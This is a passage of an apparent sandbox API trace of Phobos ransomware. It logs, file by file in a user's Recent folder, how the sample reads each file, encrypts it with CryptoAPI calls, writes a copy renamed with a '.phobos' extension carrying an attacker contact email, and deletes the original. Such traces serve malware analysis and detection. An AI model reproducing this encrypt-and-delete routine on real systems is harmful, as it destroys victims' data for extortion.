dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.597] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.597] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.597] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xeb5, lpOverlapped=0x0) returned 1 [0200.599] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xec0, dwBufLen=0xec0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xec0) returned 1 [0200.599] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xec0, lpOverlapped=0x0) returned 1 [0200.600] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.600] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.600] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.600] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.600] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.600] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.600] CloseHandle (hObject=0x124) returned 1 [0200.600] CloseHandle (hObject=0xfc) returned 1 [0200.600] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fKsV2KBu6bxqG3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fksv2kbu6bxqg3.lnk")) returned 1 [0200.601] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.602] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=599) returned 1 [0200.602] CloseHandle (hObject=0xfc) returned 1 [0200.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk")) returned 0x20 [0200.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.602] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.602] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.604] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.604] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.604] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x257, lpOverlapped=0x0) returned 1 [0200.605] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x260, dwBufLen=0x260 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x260) returned 1 [0200.605] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x260, lpOverlapped=0x0) returned 1 [0200.606] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.606] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.606] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.606] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.606] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.606] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.606] CloseHandle (hObject=0xfc) returned 1 [0200.606] CloseHandle (hObject=0x124) returned 1 [0200.607] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FoPmTlXOKuop2R.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fopmtlxokuop2r.flv.lnk")) returned 1 [0200.608] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.609] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2659) returned 1 [0200.609] CloseHandle (hObject=0x124) returned 1 [0200.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk")) returned 0x20 [0200.610] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.610] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.610] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.611] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.611] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.611] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa63, lpOverlapped=0x0) returned 1 [0200.613] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70, dwBufLen=0xa70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70) returned 1 [0200.613] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa70, lpOverlapped=0x0) returned 1 [0200.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.614] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.614] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.614] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.614] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.614] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.614] CloseHandle (hObject=0x124) returned 1 [0200.614] CloseHandle (hObject=0xfc) returned 1 [0200.614] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrA5h-q 5W4ULy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fra5h-q 5w4uly.lnk")) returned 1 [0200.615] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.616] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4977) returned 1 [0200.616] CloseHandle (hObject=0xfc) returned 1 [0200.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk")) returned 0x20 [0200.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.616] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.619] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.620] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.620] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.620] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1371, lpOverlapped=0x0) returned 1 [0200.621] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1380, dwBufLen=0x1380 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1380) returned 1 [0200.621] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1380, lpOverlapped=0x0) returned 1 [0200.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.622] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.622] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.622] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.622] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.622] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.622] CloseHandle (hObject=0xfc) returned 1 [0200.622] CloseHandle (hObject=0x124) returned 1 [0200.623] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FrerAV8Z-gjuttNi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\frerav8z-gjuttni.lnk")) returned 1 [0200.624] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.625] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3710) returned 1 [0200.625] CloseHandle (hObject=0x124) returned 1 [0200.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk")) returned 0x20 [0200.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.625] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.625] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.626] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.626] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe7e, lpOverlapped=0x0) returned 1 [0200.628] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80, dwBufLen=0xe80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80) returned 1 [0200.628] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe80, lpOverlapped=0x0) returned 1 [0200.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.629] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.629] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.629] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.629] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.629] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.630] CloseHandle (hObject=0x124) returned 1 [0200.630] CloseHandle (hObject=0xfc) returned 1 [0200.630] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\fZxai2mLP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fzxai2mlp.lnk")) returned 1 [0200.630] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.750] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1025) returned 1 [0200.750] CloseHandle (hObject=0x160) returned 1 [0200.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk")) returned 0x20 [0200.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.750] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.750] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 